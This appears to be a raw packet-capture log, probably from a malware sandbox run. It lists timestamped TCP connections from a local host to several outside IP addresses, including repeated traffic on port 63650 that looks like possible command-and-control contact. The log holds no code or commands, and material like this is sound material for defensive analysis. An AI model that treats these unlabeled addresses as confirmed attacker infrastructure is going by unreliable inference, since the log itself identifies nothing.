                                                                                          Dec 4, 2024 06:37:11.880742073 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.880847931 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.880897999 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.887824059 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.887887955 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.894651890 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.894717932 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.894819021 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.894860983 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.901798964 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.901870966 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.901936054 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.901983976 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:11.907210112 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:11.907299042 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.018013954 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.018079042 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.018115044 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.018172026 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.020265102 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.020323992 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.020390987 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.020441055 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.029813051 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.029874086 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.038711071 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.038779974 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.047349930 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.047445059 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.051681042 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.051743031 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.060306072 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.060374022 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.068800926 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.068861008 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.073211908 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.073277950 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.081736088 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.081799984 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.090295076 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.090361118 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.094701052 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.094765902 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.103250980 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.103348017 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.111804008 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.111865997 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.219212055 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.219284058 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.223484993 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.223548889 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.226977110 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.227039099 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.233457088 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.233530045 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.239900112 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.239964962 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.243160009 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.243216038 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.249115944 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.249181032 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.255209923 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.255269051 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.258379936 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.258445024 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.264453888 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.264519930 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.270456076 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.270520926 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.273606062 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.273669004 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.279726028 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.279788971 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.285691023 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.285756111 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.288850069 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.289052963 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.293382883 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.293447018 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.299463034 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.299527884 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.305618048 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.305737972 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.311574936 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.311631918 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.314663887 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.314732075 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.320813894 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.320878983 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.326847076 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.326916933 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.330039978 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.330092907 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.335928917 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.335998058 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.420592070 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.420669079 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.423908949 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.424006939 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.426388979 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.426460981 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.431070089 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.431147099 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.442138910 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442148924 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442187071 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442235947 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.442276955 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.442310095 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.442332029 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.456763029 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.456780910 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.456849098 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.456866026 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.457021952 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.466937065 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.466953993 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.467046022 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.467060089 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.467150927 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.474936008 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.474955082 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.475019932 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.475033998 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.475874901 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.481453896 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.481468916 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.481532097 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.481544971 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.483705044 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.488931894 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.488945961 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.489001036 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.489016056 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.489047050 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.489099979 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.496481895 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.496499062 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.496551037 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.496563911 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.496615887 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.627573013 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.627590895 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.627667904 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.627692938 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.627820015 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.635027885 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.635047913 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.635158062 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.635173082 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.635329008 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.641534090 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.641550064 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.641628981 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.641644955 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.641712904 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.648889065 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.648904085 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.649018049 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.649032116 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.649085045 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.655953884 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.655972004 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.656054974 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.656069994 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.656120062 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.663317919 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.663335085 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.663400888 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.663415909 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.663485050 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.670823097 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.670840025 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.670881987 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.670897007 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.670962095 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.677340984 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.677362919 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.677496910 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.677511930 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.677587986 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.832505941 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.832530022 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.832617044 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.832681894 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.833002090 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.839955091 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.839975119 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.840028048 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.840051889 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.840079069 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.840116978 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.840953112 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.841011047 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.841012955 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.841078997 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.841078997 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.841097116 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.841144085 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.841177940 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:14.103800058 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:14.223790884 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:14.223941088 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:14.254956961 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:14.374830961 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:15.562736988 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:15.606209993 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:15.804984093 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:15.809041023 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:15.929018974 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:15.929135084 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:16.049055099 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:16.405188084 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:16.406869888 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:16.526854038 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:16.606347084 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:16.653115988 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:16.752895117 CET4983580192.168.2.5178.237.33.50
                                                                                          Dec 4, 2024 06:37:16.872834921 CET8049835178.237.33.50192.168.2.5
                                                                                          Dec 4, 2024 06:37:16.875747919 CET4983580192.168.2.5178.237.33.50
                                                                                          Dec 4, 2024 06:37:16.875885010 CET4983580192.168.2.5178.237.33.50
                                                                                          Dec 4, 2024 06:37:16.995695114 CET8049835178.237.33.50192.168.2.5
                                                                                          Dec 4, 2024 06:37:18.211393118 CET8049835178.237.33.50192.168.2.5
                                                                                          Dec 4, 2024 06:37:18.211477041 CET4983580192.168.2.5178.237.33.50
                                                                                          Dec 4, 2024 06:37:18.223490000 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:18.343724012 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:19.040143013 CET6365049825185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:19.041501045 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:19.090663910 CET4982563650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:19.161571026 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:19.163764954 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:19.167169094 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:19.210563898 CET8049835178.237.33.50192.168.2.5
                                                                                          Dec 4, 2024 06:37:19.210621119 CET4983580192.168.2.5178.237.33.50
                                                                                          Dec 4, 2024 06:37:19.287060976 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:20.534385920 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:20.590560913 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:20.786009073 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:20.790640116 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:20.910631895 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:20.910737991 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.030673981 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.408739090 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.408797026 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.408811092 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.408888102 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.408906937 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.408926010 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.408953905 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.449927092 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.505486012 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.505559921 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.505578995 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.505625010 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.507061005 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.507113934 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.507133961 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.515635967 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.515654087 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.515741110 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.529496908 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.529567957 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.619075060 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.619127035 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.619220972 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.623322010 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.623421907 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.623469114 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.631858110 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.631948948 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.631998062 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.640422106 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.640527010 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.640588045 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.648952007 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.649049044 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.649104118 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.715800047 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.715922117 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.716017008 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.720038891 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.720149994 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.720210075 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.728485107 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.731504917 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.731586933 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.731626034 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.739981890 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.740015030 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.740087986 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.748383999 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.748421907 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.748435020 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.756784916 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.756881952 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.756896019 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.765258074 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.765322924 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.765332937 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.809515953 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.829427958 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.829545021 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.829612017 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.833035946 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.833149910 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.833206892 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.840112925 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.842734098 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.842806101 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.842813015 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.849883080 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.849967003 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.849998951 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.857050896 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.857112885 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.857172012 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.864095926 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.864165068 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.864201069 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.871401072 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.871454000 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.871476889 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.878499031 CET6365049840185.29.10.213192.168.2.5
